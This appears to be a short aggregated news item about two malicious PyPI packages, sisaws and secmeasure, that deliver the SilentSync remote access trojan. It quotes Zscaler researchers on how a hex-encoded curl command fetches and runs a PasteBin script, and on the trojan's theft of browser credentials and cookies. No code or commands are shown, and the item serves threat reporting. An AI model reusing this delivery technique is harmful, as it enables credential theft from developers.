""SilentSync is capable of remote command execution, file exfiltration, and screen capturing," Zscaler ThreatLabz's Manisha Ramcharan Prajapati and Satyam Singh said. "SilentSync also extracts web browser data, including credentials, history, autofill data, and cookies from web browsers like Chrome, Brave, Edge, and Firefox." The packages, now no longer available for download from PyPI, are listed below. They were both uploaded by a user named "CondeTGAPIS.""
""If a developer imports the sisaws package and invokes the gen_token function, the code will decode a hexadecimal string that reveals a curl command, which is then used to fetch an additional Python script," Zscaler said. "The Python script retrieved from PasteBin is written to the filename helper.py in a temporary directory and executed.""
Two malicious packages on PyPI, sisaws and secmeasure, were uploaded by a user named CondeTGAPIS and have been removed from the repository. The sisaws package mimics a legitimate Argentina health system library but includes a gen_token function that decodes a hexadecimal string to reveal a curl command that fetches an additional Python script from PasteBin, which is written as helper.py and executed. Secmeasure masquerades as a string-cleaning security library but contains embedded functionality to drop the SilentSync RAT. SilentSync enables remote command execution, file exfiltration, screen capture, and extraction of browser credentials, history, autofill data, and cookies on Windows systems.
Read at The Hacker News
Unable to calculate read time
Collection
[
|
...
]